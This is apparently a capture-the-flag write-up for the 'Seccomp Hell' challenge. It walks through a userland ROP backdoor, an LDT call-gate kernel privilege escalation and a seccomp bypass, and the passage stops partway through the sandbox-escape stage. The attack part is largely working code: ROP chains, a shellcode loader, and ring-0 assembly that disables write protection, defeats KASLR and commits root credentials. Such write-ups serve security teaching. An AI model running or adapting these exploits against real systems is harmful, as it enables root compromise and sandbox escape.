Some challenges are userland pwns, others are kernel pwn, still others are sandbox escapes. In Seccomp Hell, you can get all three for free <3

Note: Try getting a full root shell for this challenge



You need to exploit three parts in this challenge

  1. userland exploitation
    backdoor that allows ROP chain that can be used to get arbitray code execution

  2. kernel backdoor
    backdoor that creates CALL GATE in the LDT (local descriptor table) to get kernel mode escalation and write kernel shellcode

  3. sandbox escape
    disable seccomp and escalate priviliges through kernel shellcode (corrupt current task_struct)


Guessing from the challenge description there will be at least three parts 1. userland exploitation 2. kernel exploitation 3. sandbox escape (seccomp)

The challenges consists of only three files:

├── bzImage
├── initramfs.cpio.gz
└── run.sh

a simple run.sh script


qemu-system-x86_64 \
    -cpu qemu64,+smap \
    -m 4096M \
    -kernel bzImage \
    -initrd initramfs.cpio.gz \
    -append "console=ttyS0 loglevel=3 oops=panic panic=-1 pti=on" \
    -monitor /dev/null \
    -nographic \
    -netdev user,id=net0,hostfwd=tcp::22222-:22222 \
    -device e1000,netdev=net0 \

On important aspect is that +smep (Supervisor Mode Execution Protection) protection is missing ... forshadowing

Also here is an explaination of the Kernel paramters:

  • console=ttyS0
    console output options, nothing interesting use context.newline = b'\r\n'

  • loglevel=3
    reduce the amount of logging, can be increased or removed for easier debugging

  • oops=panic
    immediatly panic on every kernel oops, means our kernel exploit needs to be precise

  • panic=-1
    immediatly reboot on kernel panic, so we can't just corrupt in another socket connection (not that we wanted to do this neccessarly either)

  • pti=on
    enable Page Table Isolation (so no cpu side channel)

we can decompress the initramfs.cpio.gz file using sth similar to this script.

Let's first look at the init script:



chown 0:0 -R /
chown 1000:1000 -R /home/user
chmod 4755 /bin/busybox

mount -t proc none /proc
mount -t sysfs none /sys
mount -t tmpfs tmpfs /tmp
mount -t devtmpfs none /dev
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
/sbin/mdev -s

chmod 666 /dev/ptmx

# network
insmod /usr/lib/modules/e1000.ko
ifup lo >& /dev/null
ifup eth0 >& /dev/null

# banner
cat /etc/banner

# kernel backdoor
insmod /usr/lib/modules/i_am_definitely_not_backdoor.ko
chmod 0666 /dev/i_am_definitely_not_backdoor

# user backdoor
echo 'server starting...'
setsid cttyhack setuidgid 1000 /bin/socat tcp-l:22222,reuseaddr,fork EXEC:"/home/user/i_am_not_backdoor.bin",pty,stderr

poweroff -f

ok we know that our vulnerable userland binary is /home/user/i_am_not_backdoor.bin and the vulnerable kernel module is /usr/lib/modules/i_am_definitely_not_backdoor.ko and accessable through /dev/i_am_definitely_not_backdoor

Test Environment

I actually used two of my tools to setup my test environment + vagd to exploit the userland binary + how2keap as an template for the kernel exploitation part

This is how my setup looks like

├── Makefile
├── bins
   ├── i_am_definitely_not_backdoor.ko
   └── i_am_not_backdoor.bin
├── exploit.py
├── libs
   ├── pwn.h
   ├── util.c
   └── util.h
├── pwn.c
├── rootfs
   ├── ...
├── scripts
   ├── build.sh
   ├── compress.sh
   ├── decompress.sh
   ├── gdbinit
   └── start-qemu.sh
└── share
    ├── bzImage
    ├── flag.txt
    ├── initramfs.cpio.gz
    ├── rootfs.cpio.gz -> initramfs.cpio.gz
    └── run.sh


Lets first get some base information:


bins/i_am_not_backdoor.bin: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, BuildID[sha1]=f4640517119249a926c7399197447b388e07807c, for GNU/Linux 3.2.0, with debug_info, not stripped


[*] './i_am_not_backdoor.bin'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[*] GCC: (Debian 13.2.0-24) 13.2.0

seccomp-tools dump:

 line  CODE  JT   JF      K
 0000: 0x20 0x00 0x00 0x00000000  A = sys_number
 0001: 0x15 0x00 0x01 0x00000000  if (A != read) goto 0003
 0002: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0003: 0x15 0x00 0x01 0x00000001  if (A != write) goto 0005
 0004: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0005: 0x15 0x00 0x01 0x00000002  if (A != open) goto 0007
 0006: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0007: 0x15 0x00 0x01 0x00000003  if (A != close) goto 0009
 0008: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0009: 0x15 0x00 0x01 0x00000009  if (A != mmap) goto 0011
 0010: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0011: 0x15 0x00 0x01 0x0000000a  if (A != mprotect) goto 0013
 0012: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0013: 0x15 0x00 0x01 0x00000029  if (A != socket) goto 0015
 0014: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0015: 0x15 0x00 0x01 0x0000002a  if (A != connect) goto 0017
 0016: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0017: 0x15 0x00 0x01 0x0000009a  if (A != modify_ldt) goto 0019
 0018: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0019: 0x15 0x00 0x01 0x0000003c  if (A != exit) goto 0021
 0020: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0021: 0x15 0x00 0x01 0x000000e7  if (A != exit_group) goto 0023
 0022: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0023: 0x06 0x00 0x00 0x00000000  return KILL

hmm, so interesting syscalls are allowed that are important for writing a assembly payload (mmap, mprotect), it also alows us to open the vulnerable kernel module (open). also for some reason a syscall called modify_ldt is whitelisted ... forshadowing

Stage 1: ROP Backdoor

At first glance the binary seems fine, but it actually corrupts the return ptr and jmps to a backdoor function using ROP:

  CALL       LAB_004018d1
  ADD        qword ptr [RSP]=>local_1e0,offset backdoor
  PUSH       RBP
  MOV        RBP,RSP

the reversed backdoor code:

    BPF_STMT(BPF_LD+BPF_W+BPF_ABS, (offsetof(struct seccomp_data, nr)))

#define ALLOW_SYSCALL(name) \
    BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, __NR_##name, 0, 1), \

#define KILL_PROCESS \

void backdoor() {

  char rop[0];


    struct sock_filter seccomp_filter[] = {
        ALLOW_SYSCALL(modify_ldt), // forshadowing

  struct sock_fprog prog = {
      .len = (unsigned short)(sizeof(seccomp_filter) / sizeof(struct sock_filter)),
      .filter = (struct sock_filter*)&seccomp_filter,

  assert(prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != -1);
  assert(prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) != -1);

The backdoor can be summarized like this:

  1. read BOF (rop chain) using read

  2. close STDIN, STDOUT and STDERR

  3. setup seccomp filter whitelist

lets take a look at the opened files, before they are closed:

ls -l /proc/$(pidof i_am_not_backdoor.bin)/fd
lrwx------    1 user     users           64 Jul 12 17:12 0 -> /dev/pts/0
lrwx------    1 user     users           64 Jul 12 17:12 1 -> /dev/pts/0
lrwx------    1 user     users           64 Jul 12 17:12 2 -> /dev/pts/0
lrwx------    1 user     users           64 Jul 12 17:12 3 -> socket:[385]
lrwx------    1 user     users           64 Jul 12 17:12 4 -> socket:[386]
lrwx------    1 user     users           64 Jul 12 17:12 5 -> /dev/ttyS0

interesting, STD fds simply point to /dev/pts/0, so what happens if we just open it again ... we regain a working STDIN.

Note: /dev/pts/0 increments if there are multiple consecutive connections, this was briefly a problem, while the instance spawner was temporarly replaced with a shared instance.

Note: this approach was unintended, the intended solution opened a socket connection using the allowed socket and connect syscalls

so let's write a simple payload that reopens /dev/pts/0 and writes a new ROP payload into a known memory address and pivot there.

Stage 1:

linfo("STAGE 1: ROP")

std = b'/dev/pts/0\0'

uname = std

passwd = b'' 

sas('220 (vsFTPd 2.3.4)', uname, 0x80)
sas('331 Please specify the password.', passwd, 0x80)

sret_gen = exe.search(asm('syscall ; ret'), executable=True)
SYSCALL_RET = next(sret_gen)

PIVOT = 0x4a7b00

rop = ROP(exe)
rop.raw(PIVOT+0x100) # rbp
rop.call(sasm('mov rax, rbx ; pop rbx ; ret'))
rop.rdi = 0x258 
rop.call(sasm('sub rax, rdi ; ret'))
rop.call(sasm('mov rdi, rax ; ret'))
rop.rax = cst.SYS_open 
rop.rsi = cst.O_RDWR

rop.rsi = PIVOT
# rop.rdx = 0x400

rop.call(sasm('mov rdi, rax ; ret'))
rop.call(sasm('leave ; ret'))

linfo("loader len: 0x%x", len(bytes(rop)))
assert len(bytes(rop)) <= 0x98

# input()
sas('530 Login incorrect.', bytes(rop), 0x98)

Stage 2: pivot ROP

Now that we have more controll over the rop chain, we can write a shellcode payload directly into memory, which we will need for further exploitation.

Stage 2:

linfo("STAGE 2: PIVOT")

LOADER = 0x400000

pivot = ROP(exe)
pivot.raw(0x6fe1be2) # rbp

pivot.rax = cst.SYS_open
pivot.rdi = PIVOT
pivot.rsi = cst.O_RDWR
pivot.rdx = 0

pivot.rax = cst.SYS_mprotect + 1
pivot.call(sasm('sub rax, 1 ; ret'))
pivot.rdi = LOADER
pivot.rsi = 0x5000
pivot.rdx = cst.PROT_READ | cst.PROT_WRITE | cst.PROT_EXEC

pivot.rax = cst.SYS_write
pivot.rdi = cst.STDOUT_FILENO
pivot.rsi = PIVOT+0x10
pivot.rdx = 8

pivot.rax = cst.SYS_read
pivot.rdi = cst.STDIN_FILENO
pivot.rsi = LOADER 
pivot.rdx = 0x1000



chain = flat({
  0: std,
  0x10: b'STAGE 2',
  0x18: b'STAGE 3',
  0x20: b'FAIL',
  0x100: pivot

linfo("pivot len: 0x%x", len(chain))


Stage 3: loader

At this point we realized that certain characters, e.g. \n and \x04 (End of Transmission) can't be send, thats why we added another loader stage, that decodes the payload and writes it into executable memory.

payload = asm('int 3')
PAYLOAD_LEN = len(payload)

loader = bytearray(asm(f"""
  {shc.write(cst.STDOUT_FILENO, PIVOT+0x18, 7)}
  xor rbx, rbx
  // get two characters (one byte)
  push 0
  {shc.syscall(cst.SYS_read, cst.STDIN_FILENO, 'rsp', 2)}
  cmp rax, 2
  jl FAIL
  pop rax
  sub ah, 0x41 
  sub al, 0x41 
  shl al, 2
  shl al, 2
  shr rax, 2
  shr rax, 2
  mov BYTE PTR [rbx+{PAYLOAD}], al
  inc rbx
  cmp rbx, {PAYLOAD_LEN}
  jb LOAD

  // jmp to next stage
  mov rax, {PAYLOAD+0x20}
  jmp rax

  {shc.write(cst.STDOUT_FILENO, PIVOT+0x20, 5)}
  int 3

# send all the code

linfo("STAGE 3: LOADER")

# linfo(disasm(loader))
sla("STAGE 2", bytes(loader))

# custom encoding:
#  hex starting a 'A'
#  and least significant nibble first

payload_enc = b''
for b in payload:
  lo = (b & 0xf) + 0x41
  hi = ((b & 0xf0) >> 4) + 0x41
  payload_enc += bytes((lo, hi))

linfo("STAGE 4: PAYLOAD")

sla('STAGE 3', payload_enc)

# linfo(disasm(payload))
linfo("payload len: 0x%x", len(payload))


This basically finishes the userland exploitation stage


Lets get into the interesting part the kernel. Let's reverse the backdoor.

simplified reversed backdoor:

int backdoor_open(void) { return 0 }
int backdoor_read(void) { return 0 }

int backdoor_write(void) {
  void* pte;    
  pte_t* pte_lock;

  // check if ldt exists (flip flops between two addresses)
  rc = follow_pte(const_pcpu_hot + 0x8f8, 0xffff880000010000,&pte,&pte_lock);
  if(rc != 0)
    return -EFAULT;

  // map ldt page for write
  char *ldt = vmap(pages,1,4, 0x8000000000000163);
  if (ldt == 0)
    return -EFAULT;

  // corrupt ldt entry 12

  ldt[0x60] = 0;
  ldt[0x61] = 0;

  ldt[0x65] = 0xec; // call gate
  ldt[0x66] = 0xc0 
  ldt[0x67] = 0;


  return 0;

static struct file_operations BACKDOOR_fops = {
    .owner = THIS_MODULE,
    .open = backdoor_open,
    .read = backdoor_read,
    .write = backdoor_write,

static struct miscdevice backdoor_device = {
    .minor = MISC_DYNAMIC_MINOR,
    .name = "keap",
    .fops = &keap_fops,

int init_module(void) {
  return 0;

void cleanup_module(void)

INT backdoor_release(void)
  return 0;


so this basically checks if a kernel page exists at 0xffff880000010000, and if that is the case it overwrites sth at offset 0x60. Directly calling this kernel module fails, so how do we allocate something in this page. Well this is where the foreshadowing comes into place and the mysterious syscall modify_ldt actually allocates into this page.

Note: modify_ldt acutally flip flops the ldt pages between two address on every call, so we actually need to call modify_ldt twice for this to work.

So what is LDT and how does it work? LDT or Local Descriptor Table is a feature similar to GDT (Global Descriptor Table) that holds segment descriptors, that can be used to give certain memory pages additional permissons like read, write and execute, but also system functionality like call, trap and interrupt gates (e.g. interrupt gates are used for syscalls), but the system flag can't be set (on s clear) using modify_ldt. Additionall info can be found in the intel bible.

So lets understand a ldt entry, we can set the following options.


struct user_desc {
    unsigned int  entry_number;
    unsigned int  base_addr;
    unsigned int  limit;
    unsigned int  seg_32bit:1;
    unsigned int  contents:2;
    unsigned int  read_exec_only:1;
    unsigned int  limit_in_pages:1;
    unsigned int  seg_not_present:1;
    unsigned int  useable:1;
#ifdef __x86_64__
     * Because this bit is not present in 32-bit user code, user
     * programs can pass uninitialized values here.  Therefore, in
     * any context in which a user_desc comes from a 32-bit program,
     * the kernel must act as though lm == 0, regardless of the
     * actual value.
    unsigned int  lm:1;

that need to be translated into this struct.


struct desc_struct {
    u16 limit0;
    u16 base0;
    u16 base1: 8, type: 4, s: 1, dpl: 2, p: 1;
    u16 limit1: 4, avl: 1, l: 1, d: 1, g: 1, base2: 8;
} __attribute__((packed));

using this translation function.


static inline void fill_ldt(struct desc_struct *desc, const struct user_desc *info)
    desc->limit0        = info->limit & 0x0ffff;

    desc->base0     = (info->base_addr & 0x0000ffff);
    desc->base1     = (info->base_addr & 0x00ff0000) >> 16;

    desc->type      = (info->read_exec_only ^ 1) << 1;
    desc->type         |= info->contents << 2;
    /* Set the ACCESS bit so it can be mapped RO */
    desc->type         |= 1;

    desc->s         = 1;
    desc->dpl       = 0x3;
    desc->p         = info->seg_not_present ^ 1;
    desc->limit1        = (info->limit & 0xf0000) >> 16;
    desc->avl       = info->useable;
    desc->d         = info->seg_32bit;
    desc->g         = info->limit_in_pages;

    desc->base2     = (info->base_addr & 0xff000000) >> 24;
     * Don't allow setting of the lm bit. It would confuse
     * user_64bit_mode and would get overridden by sysret anyway.
    desc->l         = 0;

Like we mentioned we can't create a system segment (S flag is clear). So let's create an entry at offset 12 (0x60/8) and see what happens.


  struct user_desc ldt = {
      .entry_number = 12, // max 0x1ffe
      .base_addr = 0x8899aabb, // 32 bits
      .limit = 0xdeeff, // 20 bits
      .contents=0, // 2 bits
      .read_exec_only=0, // 1 bit
      .seg_not_present=0, // 1 bit
      .useable=0, // 1 bit
      .seg_32bit=0, // 1 bit
      .limit_in_pages=0, // 1 bit

  SYSCHK(syscallt(SYS_modify_ldt, 0x11, &ldt, sizeof(ldt)));

before corrupt:

0xffff880000010060:     0x880df399aabbeeff
0xffff880000010060:     0xeeff  0xaabb  0xf399  0x880d
0xffff880000010060:     0xff    0xee    0xbb    0xaa    0x99    0xf3    0x0d    0x88

desc_struct {
        .limit0        = 0xeeff   
        .limit1        = 0xd
        .base0         = 0xaabb 
        .base1         = 0x88
        .base2         = 0x99
        .type          = 0x3 (contents=0, ACCESS=1, read_exec_only=1)
        .s             = 1
        .dpl           = 3
        .p             = 1
        .avl           = 0
        .l             = 0
        .d             = 0
        .g             = 0

after corrupt:

0xffff880000010060:     0x00c0ec99aabb0000
0xffff880000010060:     0x0000  0xaabb  0xec99  0x00c0
0xffff880000010060:     0x00    0x00    0xbb    0xaa    0x99    0xec    0xc0    0x00

desc_struct {
        .limit0        = 0x0   
        .limit1        = 0x0
        .base0         = 0xaabb 
        .base1         = 0x00
        .base2         = 0x99
        .type          = 0xc (contents=3, ACCESS=0, read_exec_only=0)
        .s             = 0
        .dpl           = 3
        .p             = 1
        .avl           = 0
        .l             = 0
        .d             = 1
        .g             = 1

So looks like the backdoor actually creates a system segment for us, let's look at the table to understand what system segment type we have

System-Segment and Gate-Descriptor Types:

Type Field Description
Hex   11   10   9   8   32-Bit Mode   IA-32e Mode
0x0 0 0 0 0 Reserved Upper 8 bytes of an 16-byte descriptor
0x1 0 0 0 1 16-bit TSS (Available) Reserved
0x2 0 0 1 0 LDT LDT
0x3 0 0 1 1 16-bit TSS (Busy) Reserved
0x4 0 1 0 0 16-bit Call Gate Reserved
0x5 0 1 0 1 Task Gate Reserved
0x6 0 1 1 0 16-bit Interrupt Gate Reserved
0x7 0 1 1 1 16-bit Trap Gate Reserved
0x8 1 0 0 0 Reserved Reserved
0x9 1 0 0 1 32-bit TSS (Available) 64-bit TSS (Available)
0xa 1 0 1 0 Reserved Reserved
0xb 1 0 1 1 32-bit TSS (Busy) 64-bit TSS (Busy)
0xc 1 1 0 0 32-bit Call Gate 64-bit Call Gate
0xd 1 1 0 1 Reserved Reserved
0xe 1 1 1 0 32-bit Interrupt Gate 64-bit Interrupt Gate
0xf 1 1 1 1 32-bit Trap Gate 64-bit Trap Gate

And the backdoor created a 64-bit Call Gate for us.

Stage 4: kernel backdoor, LDT call gate

A Call gate is a x86 feature that allows switching between privilige levels similar to syscalls (interrupt gates).

After realizing this we actually found this super cool writeup from hlt about his challenge one_byte from hxp 2022. That talks about using call gates to disable smap to get CPL 0 (ring 0) code execution.

Note: this wouldn't work if smep was enabled, because you can't temporarly disable smep without direct access to CR4 afaik

and with a few adjustions we can create a privilige escalation PoC:

diff from one_byte solution:
< // gcc -no-pie -nostdlib -Wl,--build-id=none -s pwn.S -o pwn
> // gcc -no-pie -nostdlib -Wl,--build-id=none,-section-start=.text=0xc00000 -s pwn.S -o ./pwn
< #define PERCPU_CURRENT 0x1fbc0
< #define STRUCT_TASK_STRUCT_CRED 0x0a80
< #define STRUCT_CRED_USAGE 0x0
< // TODO: Check that &ring0 == 0x401000
> #define COMMIT_CREDS 0xfc820
> #define PREPARE_CREDS 0xfccd0
> // TODO: Check that &ring0 == 0xc00000
<     // Set current->cred and current->real_cred to init_task->cred
<     addq $KASLR_INIT_TASK, %rdx
<     movq STRUCT_TASK_STRUCT_CRED(%rdx), %rdx
<     addl $2, STRUCT_CRED_USAGE(%rdx)
<     movq %gs:PERCPU_CURRENT, %rax
<     movq %rdx, STRUCT_TASK_STRUCT_CRED(%rax)
<     movq %rdx, STRUCT_TASK_STRUCT_REAL_CRED(%rax)
>     // get .text base
>     subq $(KASLR_WRITE_TO+0x400000), %rdi
>     andq $(~0xfffff), %rdi
>     movq %rdi, %r15
>     // privilige escalation
>     // crpt_cred = prepare_cred();
>     lea PREPARE_CREDS(%r15), %rax
>     call *%rax
>     // crpt_cred.uid = 0;
>     // crpt_cred.gid = 0;
>     movq %rax, %rdi
>     movq $0, 8(%rdi)
>     // commit_creds(crpt_cred);
>     lea COMMIT_CREDS(%r15), %rax
>     call *%rax
< asciz module_path, "/dev/one_byte"
> asciz module_path, "/dev/i_am_definitely_not_backdoor"
<     exit_64 $0
>     movq $0, %rdi
>     check_syscall_64 $SYS_exit
privilige escalation PoC:
// gcc -no-pie -nostdlib -Wl,--build-id=none,-section-start=.text=0xc00000 -s pwn.S -o ./pwn

#include <linux/mman.h>
#include <sys/syscall.h>

.pushsection .text.1
    negl %eax
    movl $SYS_exit_group, %eax

.macro check_syscall_64 nr:req, res=%rax
    movl \nr, %eax
    test \res, \res
    js __syscall_64_fail.L

.macro var name:req
    .pushsection .data
    .balign 8
    .local \name

.macro endvar name:req
    .local end_\name
    .eqv sizeof_\name, end_\name - \name

.macro asciz name:req, data:vararg
    var \name
        .asciz \data
    endvar \name

.macro far_ptr name:req, selector:req, offset:req
    var \name
        .int \offset
        .short \selector
    endvar \name

.macro fn name:req
    .global \name

// <*/fcntl.h> are all C-only
#define O_WRONLY 1

// Yes, ordering in kernel and user mode are different, blame AMD/Intel.
#define __KERNEL_CS   (2 * 8)

// For 4-level paging
#define LDT_BASE_ADDR 0xffff880000000000
#define LDT_STRIDE 0x10000
#define PTI_SWITCH_MASK 0x1000

// Arbitrary constants
#define STACK_SIZE 0x80000

// Selectors for the LDT have bit 2 set. Also RPLs
#define LDT_SELECTOR 0b100
#define RPL_KERNEL   0b000
#define RPL_USER     0b011
#define TARGET_ENTRY 12

// With one descriptor (i.e. a one-byte write): modifiable bits in cs_offset:
//   0x0000000000401000 <- ring0
//   0x00000000ffdfffff
//             |||\___/
//             |||  \____ limit
//             \/\_______ G, D, 0, AV
//              \________ base_addr[31:24]

#define MSR_LSTAR 0xc0000082
#define KASLR_WRITABLE 0xa00000
#define KASLR_LSTAR 0xa00010
#define KASRL_WRITABLE_END 0xc00000
#define KASLR_WRITE_TO 0xbad000
#define KASLR_INIT_TASK 0x1613940

#define COMMIT_CREDS 0xfc820
#define PREPARE_CREDS 0xfccd0

// TODO: Check that &ring0 == 0xc00000
fn ring0
    // Disable interrupts (interrupts cause double faults right now)

    // Read LSTAR to bypass KASLR
    movl $MSR_LSTAR,  %ecx
    shlq $32, %rdx
    orq %rax, %rdx
    subq $KASLR_LSTAR, %rdx
    movq %rdx, %rbp

    // Disable WP
    movq %cr0, %r8
    andq $(~(1 << 16)), %r8
    movq %r8, %cr0

    // Copy stage 2 to the mapped kernel entry point
    movq %rbp, %rdi
    addq $KASLR_WRITE_TO, %rdi
    movq %rdi, %r15
    leaq ring0_stage2(%rip), %rsi
    movl $sizeof_ring0_stage2, %ecx
    rep movsb

    // Jump there.
    jmp *%r15

var ring0_stage2
    // Get access to per-cpu variables (current, mostly) via swapgs

    // Get the current page table.
    movq %cr3, %rbx

    // Switch to the kernel page table.
    andq $(~PTI_SWITCH_MASK), %rbx
    movq %rbx, %cr3

    // get .text base
    subq $(KASLR_WRITE_TO+0x400000), %rdi
    andq $(~0xfffff), %rdi
    movq %rdi, %r15

    // privilige escalation
    // crpt_cred = prepare_cred();

    lea PREPARE_CREDS(%r15), %rax
    call *%rax

    // crpt_cred.uid = 0;
    // crpt_cred.gid = 0;
    movq %rax, %rdi
    movq $0, 8(%rdi)

    // commit_creds(crpt_cred);
    lea COMMIT_CREDS(%r15), %rax
    call *%rax

    // Swap back

    // Switch the page table back around
    orq $PTI_SWITCH_MASK, %rbx
    movq %rbx, %cr3

    // Build an `iret` stackframe rather than a `ret far` stack frame.
    popq %r8 // => %rip
    popq %r9 // => %cs
    orq $(1 << 9), (%rsp) // Set IF in the new RFLAGS (like sti)
    pushq %r9
    pushq %r8
endvar ring0_stage2

var user_desc
    // base2 (base_addr[31:24]) == cs_offset[31:24]
    // limit_in_pages           == cs_offset[23]
    // seg_32bit                == cs_offset[22]
    // NB: Because lm is ignored, cs_offset[21] must be 0
    // useable                  == cs_offset[20]
    // limit1 (limit[19:16])    == cs_offset[19:16]
    // flags0                   == (arbitrary, will be overwritten later)
    // base1 (base_addr[23:16]) == (ignored entirely)
    // base0 (base_addr[15:0])  == __KERNEL_CS
    // limit0 (limit[15:0])     == cs_offset[15:0]
    .int TARGET_ENTRY // entry_number
    .int __KERNEL_CS  // base_addr
    .int 0x01000      // limit
    .int 0b00000001   // flags (int because of padding - only the low byte is actually used)
    //     |||||\/\____  .seg_32bit (D) (must be 1 for set_thread_area)
    //     ||||| \_____  .contents (top 2 bits of type, must be 00 or 01 for set_thread_area)
    //     ||||\_______  .read_exec_only (!R)
    //     |||\________  .limit_in_pages (G)
    //     ||\_________  .seg_not_present (!P)
    //     |\__________  .useable (AV)
    //     \___________  .lm (will be ignored)
endvar user_desc

// On the next descriptor, the CPU wants type == 0 here (or you get a #GP(selector)).
// We can't achieve this without another write, but here's what the values mean.
//     base2 (base_addr[31:24]) == (ignored)
//     flags1                   == (ignored)
//     limit1 (limit[19:16])    == (ignored)
//     flags0                   == (mostly ignored, except for the type)
//     base1 (base_addr[23:16]) == (ignored)
//     base0 (base_addr[15:0])  == cs_offset[63:48]
//     limit0 (limit[15:0])     == cs_offset[47:32]

var high_desc
    // We need a placeholder so that the LDT is long enough (i.e. contains the cleared descriptor
    // above the target descriptor).
    .int TARGET_ENTRY + 2 // entry_number
    .int 0xffff           // base_addr
    .int 0xffff           // limit
    .int 0b00111000       // flags
endvar high_desc

asciz module_path, "/dev/i_am_definitely_not_backdoor"
asciz shell_path, "/bin/sh"

var shell_argv
    .quad shell_path
    .quad 0
endvar shell_argv

var module_message
    .byte 0b11101100
endvar module_message

.macro modify_ldt desc:req
    movl $sizeof_\desc, %edx
    leaq \desc(%rip), %rsi
    movl $0x11, %edi
    check_syscall_64 $SYS_modify_ldt, %eax // Result is zero-extended from 32 bits for weird ABI reasons.

fn _start
    // Open device
    xorl %edx, %edx
    movl $O_WRONLY, %esi
    leaq module_path(%rip), %rdi
    check_syscall_64 $SYS_open
    movl %eax, %r15d

    // "stac" in CPL3
    orq $(1 << 18), (%rsp)

    // Update the LDT
    modify_ldt user_desc
    modify_ldt high_desc

    // Trigger the overwrite
    movl $sizeof_module_message, %edx
    leaq module_message(%rip), %rsi
    movl %r15d, %edi
    check_syscall_64 $SYS_write

    // Go to CPL 0
    far_ptr gate_target, TARGET_SELECTOR, 0xdead8664
    lcall *(gate_target)

    // Get a shell
    leaq shell_path(%rip), %rdi
    leaq shell_argv(%rip), %rsi
    xorl %edx, %edx
    check_syscall_64 $SYS_execve
    movq $0, %rdi
    check_syscall_64 $SYS_exit

// vim:syntax=asm:

so let's rewrite this into a python payload.

Stage 4:

trampolin = asm('int 3')

far_func = p64(0x67dead8664)

payload = bytearray(far_func+seccomp+asm(f"""
  {shc.echo("STAGE 4")}

  {shc.echo("[+] INIT\n")}

  {shc.syscall(cst.SYS_open, 'rsp', cst.O_RDWR, 0)}
  cmp rax, 0
  jl FAIL

  mov rbx, rax
  {shc.echo("[+] backdoor fd: ")}
  {shc.syscall(cst.SYS_write, cst.STDOUT_FILENO, 'rsp', 'rcx')}

  {shc.echo("\n[+] START\n")}

  // disable SMAP
  {shc.echo("[+] 'stac' in CPL3\n")}
  or         QWORD PTR [rsp],0x40000

  {shc.echo("[+] modify_ldt user\n")}
  mov        rax, 0x100001000
  push       rax
  mov        rax, 0x100000000c
  push       rax
  mov        rsi, rsp

  mov        edx,0x10
  mov        edi,0x11
  mov        eax,{cst.SYS_modify_ldt}
  cmp rax, 0
  jl FAIL

  {shc.echo("[+] modify_ldt high\n")}

  mov        rax, 0x380000FFFF
  push       rax
  mov        rax, 0xFFFF0000000E
  push       rax
  mov        rsi, rsp

  mov        edx,0x10
  mov        edi,0x11
  mov        eax,{cst.SYS_modify_ldt}

  cmp rax, 0
  jl FAIL

  {shc.echo("[+] write to backdoor\n")}
  mov rsi, rsp
  {shc.syscall(cst.SYS_write, 'rbx', 'rsi', 0)}
  cmp rax, 0
  jl FAIL

  {shc.echo("[+] cpy trampolin\n")}
  {shc.mmap_rwx(size=0x10000, address=TRAMPOLIN)}
  lea rsi, [rip+TRAMPOLIN]
  {shc.memcpy(TRAMPOLIN, 'rsi', TRAMPOLIN_LEN)}

  // call CALL GATE for privilige escalation
  {shc.echo("[+] go to CPL 0\n")}
  call   FWORD PTR ds:{PIVOT-0xa6b00}

  // should be root
  {shc.echo("[+] spawning shell\n")}

  {shc.echo("[+] END\n")}
  int 3

  mov rbx, rax
  neg rbx
  {shc.echo("[-] errno: ")}
  {shc.syscall(cst.SYS_write, cst.STDOUT_FILENO, 'rsp', 'rcx')}
  {shc.echo("\n[-] FAIL\n")}
  int 3

""") + trampolin)

Stage 5.1: call gate trampolin

the trampolin stays the same as in the one_byte writeup.

Stage 5.1:

TRAMPOLIN = 0xc00000


ring0 = asm('int 3')
RING0_LEN = len(ring0)

# write ring0 payload to kernel space and execute 
trampolin = asm(f"""

  // Read LSTAR to bypass KASLR
  mov ecx, {MSR_LSTAR}
  shl rdx, 32
  or rdx, rax
  subq rdx, {KASLR_LSTAR}
  movq rbp, rdx

  // Disable WP
  movq r8, cr0
  andq r8, {(~(1 << 16))}
  movq cr0, r8

  // Copy stage 5.2 to the mapped kernel entry point
  movq rdi, rbp
  addq rdi, {KASLR_WRITE_TO}
  movq r15, rdi
  lea rsi, [rip+RING_0]
  mov ecx, {RING0_LEN}
  rep movsb

  // Jump there.
  jmp r15

""") + ring0

TRAMPOLIN_LEN = len(trampolin)

Sandbox (Seccomp)

Finally let's try to write shellcode to disable seccomp.

Stage 5.2: ring 0 payload

For ring0 we will need to make some adjustions. The privilige escalation stays the same as in our PoC, but we will have to find some way to disable seccomp, even though we found this writeup about disabling seccomp it isn't helpfull anymore, because the x86 linux kernel changed the way seccomp works in newer version, but it gives us some important starting points: current (task_struct).

Lets first look at the task_struct, which simply includes a struct called seccomp:


/* Valid values for seccomp.mode and prctl(PR_SET_SECCOMP, <mode>) */
#define SECCOMP_MODE_DISABLED   0 /* seccomp is not in use. */
#define SECCOMP_MODE_STRICT 1 /* uses hard-coded filter. */
#define SECCOMP_MODE_FILTER 2 /* uses user-supplied filter. */

Note: SECCOMP_MODE_DISABLED is not a valid mode to set using prctl Source Code


struct seccomp {
    int mode;
    atomic_t filter_count;
    struct seccomp_filter *filter;

So can we just manually set the mode to SECCOMP_MODE_DISABLED ? ... no I also tried overwriting other parts in the seccomp struct, but none of this worked either. Ok let's go deeper down the rabbid hole and look at seccomp_filter


struct seccomp_filter {
    refcount_t refs;
    refcount_t users;
    bool log;
    bool wait_killable_recv;
    struct action_cache cache;
    struct seccomp_filter *prev;
    struct bpf_prog *prog;
    struct notification *notif;
    struct mutex notify_lock;
    wait_queue_head_t wqh;

No luck either, also manually patching the instructions bpf_prog didn't work.

Note: i didn't try messing with the flags to e.g. disable jited, so this might have worked

So what now? ... Well if we look ath the seccomp_filter struct we see a member called prev, interesting let's look at the source code for adding seccomp filters:

basically the seccomp_filters are a linked list, where as new filters replace the current root entry.

so let's first try to add a simple rules that allows everything.


void allow_all() {

    struct sock_filter seccomp_filter[] = {

  struct sock_fprog prog = {
      .len = (unsigned short)(sizeof(seccomp_filter) / sizeof(struct sock_filter)),
